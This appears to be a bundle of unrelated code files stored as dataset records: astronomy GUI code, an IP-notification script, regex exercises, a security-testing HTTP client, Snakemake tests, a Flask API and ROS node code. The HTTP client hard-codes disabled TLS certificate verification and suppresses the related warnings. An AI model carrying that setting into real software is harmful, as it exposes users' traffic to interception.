< 2.4e6: t2 += 2.4e6\r\n txt += str(t1) + ',' + str(t2) + '\\n'\r\n nt += 2\r\n txt = txt.strip()\r\n kepmsg.log(outf, txt, True)\r\n print('\\nWrote ASCII file ' + outf)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# clear time domain mask\r\n\r\ndef clicker3(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 723 and event.x < 1022 and\r\n event.y > 12 and event.y < 68):\r\n mask = []\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# print time domain mask\r\n\r\ndef clicker4(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 1042 and event.x < 1342 and\r\n event.y > 12 and event.y < 68):\r\n nt = 0; txt = ''\r\n for i in range(int(len(mask)/2)):\r\n t1 = float(mask[nt]) + barytime0\r\n t2 = float(mask[nt+1]) + barytime0\r\n if t1 < 2.4e6: t1 += 2.4e6\r\n if t2 < 2.4e6: t2 += 2.4e6\r\n txt += str(t1) + ',' + str(t2) + '\\n'\r\n nt += 2\r\n txt = txt.strip()\r\n print('\\n' + txt)\r\n plt.disconnect(aid)\r\n plt.disconnect(bid)\r\n plt.disconnect(cid)\r\n plt.disconnect(did)\r\n plt.disconnect(eid)\r\n plt.disconnect(fid)\r\n plotlc()\r\n\r\n# -----------------------------------------------------------\r\n# left-click create time ranges\r\n\r\ndef clicker6(event):\r\n\r\n global mask, aid, bid, cid, did, eid, fid\r\n\r\n if event.inaxes:\r\n if event.button == 1:\r\n if (event.x > 83 and event.x < 1337 and\r\n event.y > 122 and event.y < 558):\r\n if len(mask) % 2 == 0:\r\n mask.append(event.xdata)\r\n else:\r\n if event.xdata > mask[-1]:\r\n mask.append(event.xdata)\r\n else:\r\n mask.append(mask[-1])\r\n mask[-2] = event.xdata\r\n plotlc()\r\n\r\ndef keprange_main():\r\n import argparse\r\n parser = argparse.ArgumentParser(\r\n description=('Interactively define and store time ranges via a'\r\n ' GUI'),\r\n formatter_class=PyKEArgumentHelpFormatter)\r\n parser.add_argument('infile', help='Name of input file', type=str)\r\n parser.add_argument('--outfile',\r\n help=('Name of ASCII file to output time ranges.'\r\n ' If None, outfile is infile-keprange.'),\r\n 
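Annotation: the keprange GUI above dispatches everything through `plt.connect('button_press_event', ...)` and then discriminates its buttons by raw pixel ranges (`event.x`, `event.y`), which is fragile across figure sizes and DPI settings. A minimal self-contained example of the same event API that keys off `event.inaxes` and data coordinates instead:

```python
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot([0, 1, 2], [0, 1, 0])
marks = []

def on_click(event):
    # event.xdata / event.ydata are data coordinates, valid only inside an Axes.
    if event.inaxes is ax and event.button == 1:
        marks.append(event.xdata)
        ax.axvline(event.xdata, color='g', linewidth=0.5)
        fig.canvas.draw_idle()

cid = fig.canvas.mpl_connect('button_press_event', on_click)
plt.show()
```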
default=None)\r\n parser.add_argument('--datacol', default='SAP_FLUX',\r\n help='Name of diagnostic FITS column', type=str)\r\n parser.add_argument('--rinfile', default='',\r\n help='Name of input ASCII time ranges file')\r\n parser.add_argument('--overwrite', action='store_true',\r\n help='Overwrite output file?')\r\n parser.add_argument('--verbose', action='store_true',\r\n help='Write to a log file?')\r\n parser.add_argument('--logfile', '-l', help='Name of ascii log file',\r\n default='keprange.log', dest='logfile', type=str)\r\n args = parser.parse_args()\r\n keprange(args.infile, args.outfile, args.datacol, args.rinfile,\r\n args.overwrite, args.verbose, args.logfile)\r\n","sub_path":"pyke/keprange.py","file_name":"keprange.py","file_ext":"py","file_size_in_byte":15979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"292550152","text":"#!/usr/bin/env python3\n\"\"\"A IP pushing tool for headless devices with ephemeral ip addresses. \nPushes IPs to Discord or Pushbullet.\n\n\nUsage:\n get_ip_addr.py discord (-t | --token=) (-i | --id=)\n get_ip_addr.py pushbullet (-t | --token=)\n get_ip_addr.py (-c | --config=)\n get_ip_addr.py\n\n\nOptions:\n -t , --token= token for discord or pushbullet\n -i , --id= id for discord\n -c , --config= [default: /etc/ip-pusher.json]\n\n\n\"\"\"\n\n\nimport os\nimport json\nimport requests\nfrom docopt import docopt\n\n\ndef get_config():\n args = docopt(__doc__, version='0.1.0')\n print(args)\n if not args['discord'] and not args['pushbullet']:\n config = load_json_config(args['--config'])\n args[config['type']] = True\n args['--id'] = config['id']\n args['--token'] = config['token']\n return args\n\n\ndef load_json_config(path):\n c = {}\n if os.path.exists(path):\n try:\n with open(path) as f:\n c = json.load(f)\n except Exception as e:\n print(\"File error\", e)\n exit(1)\n else:\n print(\"No config. 
Edit config at\", path)\n exit(1)\n \n return c\n\n\ndef get_ip():\n r = requests.get('http://ip.42.pl/raw')\n if r.status_code == 200:\n return r.text\n else:\n os.exit(1)\n return ''\n\n\ndef send_discord(webh_id, token, msg):\n d_url = 'https://discordapp.com/api/webhooks/{}/{}'.format(webh_id, token)\n d_data = { 'content': msg }\n res = requests.post(d_url, json=d_data)\n res.raise_for_status()\n\n\ndef send_pushbullet(token, title, msg):\n pb_url = 'https://api.pushbullet.com/v2/pushes'\n pb_data = { 'type': 'note', 'title': title, 'body': msg } \n res = requests.post(pb_url, json=pb_data, headers={'Access-Token': token})\n res.raise_for_status()\n\n\ndef main():\n config = get_config()\n host = os.uname()[1]\n ip = get_ip()\n title = \"IP from \\\"{}\\\"\".format(host)\n msg = \"IP : {}\\nDomain (TTL in 5m): {}.jackhil.de\".format(ip, host)\n\n if config['pushbullet']:\n send_pushbullet(config['--token'], title, msg)\n elif config['discord']:\n send_discord(config['--id'], config['--token'], msg)\n else:\n print(\"No configured sender\")\n exit(1)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"get_ip_addr.py","file_name":"get_ip_addr.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"93100095","text":"filters = [\n [\n \"10m_u_component_of_wind\",\n \"10m u component of wind\"\n ],\n [\n \"10m_v_component_of_wind\",\n \"10m v component of wind\"\n ],\n [\n \"2m_dewpoint_temperature\",\n \"2m dewpoint temperature\"\n ],\n [\n \"2m_temperature\",\n \"2m temperature\"\n ],\n [\n \"mean_sea_level_pressure\",\n \"Mean sea level pressure\"\n ],\n [\n \"mean_wave_direction\",\n \"Mean wave direction\"\n ],\n [\n \"mean_wave_period\",\n \"Mean wave period\"\n ],\n [\n \"sea_surface_temperature\",\n \"Sea surface temperature\"\n ],\n [\n \"significant_height_of_combined_wind_waves_and_swell\",\n \"Significant height of combined wind waves and swell\"\n ],\n [\n \"surface_pressure\",\n \"Surface pressure\"\n ],\n [\n \"total_precipitation\",\n \"Total precipitation\"\n ]\n]\n","sub_path":"canvas/constants/reanalysis_era5_single_levels/partials/popular.py","file_name":"popular.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"289047210","text":"# -*- coding:utf-8 _*-\n\"\"\" \n@author:mongo\n@time: 2018/12/17 \n@email:3126972006@qq.com\n@function: \n\"\"\"\n\n# 正则表达式完成字符串的查找\n# s1 = 'world hello'\n# pattern = 'hello' # 正则表达式\n# res = re.match(pattern=pattern, string=s1) # 最开始位置查找,找到则返回一个match对象,无则返回None\n# match3 = re.search(pattern=pattern, string=s1) # 任意位置找,找到则返回一个match对象,无则返回None\n# print(match3)\n# res1 = re.findall(pattern=pattern, string=s1) # 查找全部匹配字符串,并且将查找到的匹配字符放到一个列表里面\n# print(res1)\n# # 变量名#\ns = '{\"mobilephone\":\"${normal_user}\",\"pwd\":\"${pwd}\"}'\n\n# # 目标字符串\n# res4 = re.findall(pattern='(\\d{11})',string=s)\n#\n# s1 = re.sub('\\$\\{(.*?)\\}','123456',s)\n# print(s1)\n#\n# res5 = re.search(pattern='\\$\\{(.*?)\\}', string=s)\n# print(res5.group(0), res5.group(1))\n#\n# # 正则表达式分组\n# s4 = 'www.lemonban.com'\n# p = '(w)(ww)' # ()进行分组\n# m = re.search(p,s4)\n# print(m)\n# print(m.group(0)) # 全匹配\n# print(m.group(1)) # 拿到第一个分组里面的字符\n# print(m.group(2)) # 拿到第二个分组里面的字符\n\n\nimport json\nimport re\n\n# 使��字典解析 解析-遍历-判断-统计\nwith open('loads.txt', 'r', encoding='utf-8') as fp: # 打开文件\n financelog = json.load(fp) # 文件对象序列化成字典\n datas = financelog['data'] # 获取data列表\n flag = 0\n 
for data in datas: # iterate over the list\n if data['status'] == '1': # check whether status equals 1\n flag += 1 # count the status=1 records\n print(\"Number of records with status=1:\", flag)\n\n# Parse with a regex: match and find\nfinancelog = open('loads.txt', 'r', encoding='utf-8').read() # read the file contents and return a string\nstatus = re.findall('\"status\": \"1\"', financelog) # find every \"status\": \"1\" occurrence in the target string and put the matches into a list\nprint(\"Number of records with status=1:\", len(status)) # the length of the list is the number of \"status\": \"1\" records\n\n\n#findall\ns = '{\"mobilephone\":\"${normal_user}\",\"pwd\":\"${pwd}\"}'\npattern = '\\$\\{(.*?)\\}'\nss = re.findall(pattern,s)\nprint(ss)\n\nre.sub(pattern,'aaa',s)\n","sub_path":"study_re.py","file_name":"study_re.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"473140692","text":"# Copyright 2015 Rackspace\n#\n# Original from OpenCafe (https://github.com/openstack/opencafe)\n#\n# Changes copyright 2016 Intel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport logging\nfrom time import time\n\nimport requests\nfrom requests.packages import urllib3\nimport six\nurllib3.disable_warnings()\n\n\ndef _log_transaction(log, level=logging.DEBUG):\n \"\"\"Decorator used for logging requests/response in clients.\n\n Takes a python Logger object and an optional logging level.\n \"\"\"\n\n def _safe_decode(text, incoming='utf-8', errors='replace'):\n \"\"\"Decodes incoming text/bytes using `incoming` if not already unicode.\n\n :param incoming: Text's current encoding\n :param errors: Errors handling policy. 
See here for valid\n values http://docs.python.org/2/library/codecs.html\n\n :returns: text or a unicode `incoming` encoded\n representation of it.\n \"\"\"\n\n if isinstance(text, six.text_type):\n return text\n\n return text.decode(incoming, errors)\n\n def _decorator(func):\n \"\"\"Accepts a function and returns wrapped version of that function.\"\"\"\n def _wrapper(*args, **kwargs):\n \"\"\"Logging wrapper for any method that returns a requests response.\n\n Logs requestslib response objects, and the args and kwargs\n sent to the request() method, to the provided log at the provided\n log level.\n \"\"\"\n\n logline = '{0} {1}'.format(args, kwargs)\n\n try:\n log.debug(_safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.info(\n 'Exception occurred while logging signature of calling '\n 'method in http client')\n log.exception(exception)\n\n # Make the request and time its execution\n response = None\n elapsed = None\n try:\n start = time()\n response = func(*args, **kwargs)\n elapsed = time() - start\n except Exception as exception:\n log.critical('Call to Requests failed due to exception')\n log.exception(exception)\n raise exception\n\n # requests lib 1.0.0 renamed body to data in the request object\n request_body = ''\n if 'body' in dir(response.request):\n request_body = response.request.body\n elif 'data' in dir(response.request):\n request_body = response.request.data\n else:\n log.info(\n \"Unable to log request body, neither a 'data' nor a \"\n \"'body' object could be found\")\n\n # requests lib 1.0.4 removed params from response.request\n request_params = ''\n request_url = response.request.url\n if 'params' in dir(response.request):\n request_params = response.request.params\n elif '?' in request_url:\n request_url, request_params = request_url.split('?')\n\n logline = ''.join([\n '\\n{0}\\nREQUEST SENT\\n{0}\\n'.format('-' * 12),\n 'request method..: {0}\\n'.format(response.request.method),\n 'request url.....: {0}\\n'.format(request_url),\n 'request params..: {0}\\n'.format(request_params),\n 'request headers.: {0}\\n'.format(response.request.headers),\n 'request body....: {0}\\n'.format(request_body)])\n try:\n log.log(level, _safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.log(level, '\\n{0}\\nREQUEST INFO\\n{0}\\n'.format('-' * 12))\n log.exception(exception)\n\n logline = ''.join([\n '\\n{0}\\nRESPONSE RECEIVED\\n{0}\\n'.format('-' * 17),\n 'response status..: {0}\\n'.format(response),\n 'response time....: {0}\\n'.format(elapsed),\n 'response headers.: {0}\\n'.format(response.headers),\n 'response body....: {0}\\n'.format(response.content),\n '-' * 79])\n try:\n log.log(level, _safe_decode(logline))\n except Exception as exception:\n # Ignore all exceptions that happen in logging, then log them\n log.log(level, '\\n{0}\\nRESPONSE INFO\\n{0}\\n'.format('-' * 13))\n log.exception(exception)\n return response\n return _wrapper\n return _decorator\n\n\nclass HTTPClient(object):\n\n \"\"\"Allows clients to inherit requests.request.\n\n @summary: Redefines request() so that keyword args are passed.\n The parameters are passed through a named dictionary\n instead of kwargs. 
Client methods can then take parameters\n that may overload request parameters, which allows client\n method calls to override parts of the request with parameters\n sent directly to requests, overriding the client method logic\n either in part or whole on the fly.\n\n \"\"\"\n\n _log = logging.getLogger(__name__)\n\n def __init__(self):\n self.default_headers = {}\n\n @_log_transaction(log=_log)\n def request(\n self, method, url, headers=None, params=None, data=None,\n requestslib_kwargs=None):\n\n # set requestslib_kwargs to an empty dict if None\n requestslib_kwargs = requestslib_kwargs if (\n requestslib_kwargs is not None) else {}\n\n # Set defaults\n params = params if params is not None else {}\n verify = False\n\n # If headers are provided by both, headers \"wins\" over default_headers\n headers = dict(self.default_headers, **(headers or {}))\n\n # Override url if present in requestslib_kwargs\n if 'url' in list(requestslib_kwargs.keys()):\n url = requestslib_kwargs.get('url', None) or url\n del requestslib_kwargs['url']\n\n # Override method if present in requestslib_kwargs\n if 'method' in list(requestslib_kwargs.keys()):\n method = requestslib_kwargs.get('method', None) or method\n del requestslib_kwargs['method']\n\n # The requests lib already removes None key/value pairs, but we force\n # it here in case that behavior ever changes\n for key in list(requestslib_kwargs.keys()):\n if requestslib_kwargs[key] is None:\n del requestslib_kwargs[key]\n\n # Create the final parameters for the call to the base request()\n # Wherever a parameter is provided both by the calling method AND\n # the requests_lib kwargs dictionary, requestslib_kwargs \"wins\"\n requestslib_kwargs = dict(\n {'headers': headers, 'params': params, 'verify': verify,\n 'data': data}, **requestslib_kwargs)\n\n # Make the request\n return requests.request(\n method, url, **requestslib_kwargs)\n","sub_path":"syntribos/clients/http/base_http_client.py","file_name":"base_http_client.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"311599364","text":"\"\"\"\nthenif2.py\n\nNeed to perform the second comparison only if the first comparison was true.\n(If the first comparison was false, the second comparison would be a\nwaste of time.)\n\"\"\"\n\nimport sys\n\nreceipts = input(\"How much were our receipts? \")\nreceipts = int(receipts)\n\nexpenditures = input(\"How much were our expenditures? 
\")\nexpenditures = int(expenditures)\n\nprint() #Skip a line.\n\nif receipts <= expenditures:\n print(\"We're not making any money.\")\n if receipts < expenditures:\n print(\"In fact, we're losing money.\")\n\nsys.exit(0)\n","sub_path":"thenif2.py","file_name":"thenif2.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"368414306","text":"from options.test_options import TestOptions\nfrom data import DataLoader\nfrom models import create_model\nfrom util.writer import Writer\nfrom models.layers import mesh_prepare\nimport os\nimport numpy as np\n\ndef add_adverserial_examples(dataset):\n #dataset.dataset.paths = []\n return\n\ndef run_test(epoch=-1, vertices = None, faces= None, label= None, attack = False):\n print('Running Test')\n opt = TestOptions().parse()\n opt.serial_batches = True # no shuffle\n dataset = DataLoader(opt)\n model = create_model(opt)\n writer = Writer(opt)\n # test\n writer.reset_counter()\n for i, data in enumerate(dataset):\n if i==4 and attack == True:\n for i in range(4):\n attacked_data = mesh_prepare.rebuild_mesh(vertices, faces)\n #data['label'][0] = label\n data['edge_features'][-i-1] = attacked_data.features# data['mesh'][0].features\n model.set_input(data)\n ncorrect, nexamples = model.test()\n writer.update_counter(ncorrect, nexamples)\n writer.print_acc(epoch, writer.acc)\n return writer.acc\n\n\ndef extract_data_of_attacked_meshes(path_to_walker_meshes):\n paths = os.listdir(path_to_walker_meshes)\n paths_to_meshes = [path for path in paths if path.__contains__('_attacked')]\n\n for mesh_path in paths_to_meshes:\n orig_mesh_data = np.load(path_to_walker_meshes + mesh_path, encoding='latin1', allow_pickle=True)\n attacked_mesh_data = {k: v for k, v in orig_mesh_data.items()}\n vertices, faces, label = attacked_mesh_data['vertices'], attacked_mesh_data['faces'], attacked_mesh_data['label']\n run_test(vertices=vertices, faces=faces, label=label, attack=True)\n\nif __name__ == '__main__':\n extract_data_of_attacked_meshes(path_to_walker_meshes = 'datasets_processed/shrec11/')\n","sub_path":"adverserial_mesh/test_attacked_meshes.py","file_name":"test_attacked_meshes.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"360820653","text":"##################################################################\nfrom sys import stdin\n\nclass InputStream:\n def __init__(self, char_stream=None):\n # if no stream given read it from the terminal\n if not char_stream:\n char_stream = stdin.read()\n # turn char stream into a list of characters\n # ignoring any kind of white space\n clean_stream = char_stream.replace(' ','') \\\n .replace('\\t','') \\\n .replace('\\n','') \n self.stream = [c for c in clean_stream]\n self.stream.append('\\eof')\n self.stream_ix = 0\n\n def pointer(self):\n return self.stream[self.stream_ix]\n\n def next(self):\n if not self.end_of_file():\n self.stream_ix += 1\n return self.pointer()\n\n def match(self, sym):\n if sym == self.pointer():\n s = self.pointer()\n self.next()\n return s\n else:\n raise SyntaxError('unexpected symbol {} while parsing, expected {}'\n .format(self.stream[self.stream_ix], sym))\n\n def end_of_file(self):\n if self.pointer() == '\\eof':\n return True\n else:\n return 
False\n","sub_path":"chap02/example/inputstream.py","file_name":"inputstream.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"387907215","text":"def rysujWykres(x,y):\n for i in range(0,10):\n a=11-len(x[i])\n wartosc=int(y[i])//3\n print(' '*a+f'{x[i]}:',end=' ')\n print('#'*wartosc)\n \n \njezyki=['Java','Python','JavaScript','C++','C#','Ruby','Perl','PHP','C','Android']\nwartosci=[61,47,37,32,26,18,14,14,9,7]\n\nrysujWykres(jezyki,wartosci)","sub_path":"04-Subroutines/after class/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646314666","text":"# Unit tests for snakemake pipelines\n\n__author__ = \"dpark@broadinstitute.org\"\n\nimport util.cmd, util.file\nimport unittest, argparse\nimport sys, os, subprocess, shutil, tempfile, argparse, itertools\nfrom test import TestCaseWithTmp\n\nif sys.version_info>=(3,2):\n import snakemake\n\n\ndef setup_dummy_simple(\n sample_names=('G1234', 'G5678', 'G3671.1_r1', 'G3680-1_4',\n '9876', 'x.y-7b')):\n ''' Set up a very simple project directory with empty input files. '''\n \n workdir = tempfile.mkdtemp()\n os.mkdir(os.path.join(workdir, 'data'))\n os.mkdir(os.path.join(workdir, 'data', '00_raw'))\n os.mkdir(os.path.join(workdir, 'log'))\n os.mkdir(os.path.join(workdir, 'reports'))\n os.mkdir(os.path.join(workdir, 'tmp'))\n \n for s in sample_names:\n with open(os.path.join(workdir, 'data', '00_raw', s+'.bam'), 'wt') as outf:\n pass\n for fn in ('samples-assembly.txt', 'samples-depletion.txt',\n 'samples-runs.txt', 'samples-assembly-failures.txt'):\n with open(os.path.join(workdir, fn), 'wt') as outf:\n for s in sample_names:\n outf.write(s+'\\n')\n \n shutil.copy(os.path.join(util.file.get_project_path(),\n 'pipes', 'Snakefile'), workdir)\n shutil.copy(os.path.join(util.file.get_project_path(),\n 'pipes', 'config.json'), workdir)\n \n os.symlink(util.file.get_project_path(),\n os.path.join(workdir, 'bin'))\n \n return workdir\n\n\n@unittest.skipIf(sys.version_info<(3,2), \"python version is too old for snakemake\")\nclass TestSimpleDryRuns(TestCaseWithTmp):\n def setUp(self):\n super(TestSimpleDryRuns, self).setUp()\n self.workdir = setup_dummy_simple()\n self.env = {'GATK_PATH':os.environ.get('GATK_PATH'),\n 'NOVOALIGN_PATH':os.environ.get('NOVOALIGN_PATH')}\n def tearDown(self):\n for k,v in self.env.items():\n if v:\n os.environ[k] = v\n super(TestSimpleDryRuns, self).tearDown()\n\n def test_dryrun_all(self):\n ''' Test that the \"all\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True))\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all']))\n\n def test_dryrun_all_assemble(self):\n ''' Test that the \"all_assemble\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n #configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all_assemble']))\n\n def test_dryrun_all_deplete(self):\n ''' Test that the \"all_deplete\" rule dryruns properly '''\n self.assertTrue(snakemake.snakemake(\n os.path.join(self.workdir, 'Snakefile'),\n 
#configfile=os.path.join(self.workdir, 'config.json'),\n workdir=self.workdir, dryrun=True,\n targets=['all_deplete']))\n","sub_path":"test/unit/test_snake.py","file_name":"test_snake.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452299076","text":"from flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom datetime import datetime\nfrom sqlalchemy.sql import func\nfrom os import environ\n\napp = Flask(__name__)\n#app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL')\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/product_db'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///product_db.db'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////product_db.db'\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\n\nclass Product(db.Model):\n __tablename__ = 'product'\n id = db.Column(db.Integer, primary_key=True)\n image = db.Column(db.String(120), nullable=False)\n name = db.Column(db.String(120), nullable=False)\n category_id = db.Column(db.Integer, db.ForeignKey(\n 'category.id'), nullable=False)\n description = db.Column(db.String(1000), nullable=False)\n unit_price = db.Column(db.Float(10), nullable=False)\n quantity = db.Column(db.Integer, nullable=False)\n\n\n def json(self):\n return {\"id\": self.id, \"image\": self.image, \"name\": self.name, \"category_id\": self.category_id, \"description\": self.description,\n \"unit_price\": self.unit_price, \"quantity\": self.quantity}\n\n\nclass Category(db.Model):\n __tablename__ = 'category'\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n name = db.Column(db.String(120), primary_key=True)\n\n \n products = db.relationship(\n 'Product', backref='products', lazy=True)\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n def json(self):\n return {\"id\": self.id, \"name\": self.name}\n\n\n# [GET] all products\n@app.route(\"/get_all_products\")\ndef get_all_products():\n products = [Product.json()\n for Product in Product.query.all()]\n if products:\n return_message = ({\"status\": \"success\",\n \"products\": products})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n# [GET] all categories\n@app.route(\"/get_all_categories\")\ndef get_all_categories():\n categories = [Category.json()\n for Category in Category.query.all()]\n if categories:\n return_message = ({\"status\": \"success\",\n \"categories\": categories})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route(\"/get_products_by_category/\")\ndef get_products_by_id():\n category_id = request.args.get('category_id')\n products = [Product.json()\n for Product in Product.query.filter_by(category_id=category_id).all()]\n if products:\n return_message = ({\"status\": \"success\",\n \"products\": products})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route(\"/get_category/\", methods=['GET'])\ndef get_category():\n category_id = request.args.get('category_id')\n category = Category.query.filter_by(id=category_id).first()\n if category:\n return_message = ({\"status\": \"success\",\n \"category\": category.json()})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\n@app.route('/get_product/', methods=['GET'])\ndef get_product():\n 
product_id = request.args.get('product_id')\n product = Product.query.filter_by(id=product_id).first()\n if product:\n return_message = ({\"status\": \"success\",\n \"product\": product.json()})\n else:\n return_message = ({\"status\": \"fail\"})\n return jsonify(return_message)\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001, debug=True)\n","sub_path":"product/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"514812151","text":"import rospy\nimport smach\nimport smach_ros\nimport time\nimport imp\nimport uuid\nimport subprocess\nimport signal\nimport os\nimport mission_control_utils\nfrom mission_control_utils_constants import Constants\nfrom mission_control_utils_cache import Cache\nfrom std_msgs.msg import Int32\nfrom std_msgs.msg import String\nfrom mission_control.msg import Variable\nfrom mission_control.msg import Answer\nfrom mission_control.msg import Health\n\nclass Behaviour:\n\n TOKEN_REQUEST_TOPIC = \"/mission_control/token/request\"\n \"\"\"string: token request topic name\"\"\"\n\n TOKEN_RELEASE_TOPIC = \"/mission_control/token/release\"\n \"\"\"string: token release topic name\"\"\"\n\n TOKEN_ASK_TOPIC = \"/mission_control/token/ask\"\n \"\"\"string: token ask topic name\"\"\"\n\n TOKEN_ANSWER_TOPIC = \"/mission_control/token/answer\"\n \"\"\"string: token answer topic\"\"\"\n\n WATCHDOG_OK_TOPIC = \"/mission_control/watchdog/ok\"\n \"\"\"string: watchdog ok topic name\"\"\"\n\n MAX_TOKEN_ASK_TIMES = 2\n \"\"\"int: how many times node will ask for token on startup\"\"\"\n\n MAX_VAR_SEARCH_RECURSION = 10\n\n _token_ask_times = 0\n \"\"\"int: how many times node has asked for token on startup\"\"\"\n\n _answer_false_gotten = False\n \"\"\"bool: indicates whether node has been denied for startup token for even once\"\"\"\n\n _answer = True\n \"\"\"bool: indicates whether node has the right to acquire token on startup.\n It is initialized to True, to solve the problem when only one node exists.\n \"\"\"\n\n _priority = 0\n \"\"\"int: node's priority. The lower the number the higher the priority\n\n Available values: 1..N\n \"\"\"\n\n _active_str = \"False\"\n \"\"\"string: after evaluation shows if the node is active or not \"\"\"\n\n _token = False\n \"\"\"bool: shows if other initialized nodes have given this node permission to work\"\"\"\n\n _paused = False\n \"\"\"bool: shows if state machine's work is paused or not\"\"\"\n\n _running = False\n \"\"\"bool: shows if the state machine is active or not\"\"\"\n\n _process = False\n \"\"\"subprocess.Popen: subprocess where script will be executed \"\"\"\n\n _script = ''\n \"\"\"string: script's full path, that will be executed \"\"\"\n\n _cache = {}\n \"\"\"dict: all the variables that node uses from state machines are stored here\"\"\"\n\n _var_ttl = {}\n \"\"\"dict: holds variables time to live in seconds\"\"\"\n\n _var_last_upt = {}\n \"\"\"dict: holds the info when the variable was last set\"\"\"\n\n _vars_from_own_proc = {}\n \"\"\"dict: holds all the variables that the child process set\"\"\"\n\n explored = []\n \"\"\"list: all the objects in child python script that have been searched for variables\"\"\"\n\n types = []\n \"\"\"list: all user defined class types that are in child python script\"\"\"\n\n _debug_level = 0\n \"\"\"int: node's debug level between 0..3 . 
0 - lowest level, 3 - highest level\"\"\"\n\n request_pub = rospy.Publisher(TOKEN_REQUEST_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: token request publisher\"\"\"\n\n release_pub = rospy.Publisher(TOKEN_RELEASE_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: token release publisher\"\"\"\n\n ok_pub = rospy.Publisher(WATCHDOG_OK_TOPIC, Health, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: watchdog ok publisher\"\"\"\n\n ask_pub = rospy.Publisher(TOKEN_ASK_TOPIC, Int32, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: startup token ask publisher\"\"\"\n\n answer_pub = rospy.Publisher(TOKEN_ANSWER_TOPIC, Answer, queue_size=Constants.QUEUE_SIZE)\n \"\"\"rospy.Publisher: startup token answer publisher\"\"\"\n\n def __init__(self):\n\n Cache.parent_node_name = rospy.get_name()\n\n self.subscribe_to_topics()\n\n def set_debug_level(self, debug_level):\n \"\"\" Sets node's debug level\n\n Args:\n debug_level (int): debug level\n \"\"\"\n\n if debug_level < 0:\n debug_level = 0\n elif debug_level > 3:\n debug_level = 3\n\n Cache.debug_level = debug_level\n self._debug_level = debug_level\n\n def set_priority(self, prio):\n \"\"\" Sets node's priority \n\n Args:\n prio (int): priority number\n \"\"\"\n\n if prio < 1:\n self._priority = 1\n else:\n self._priority = 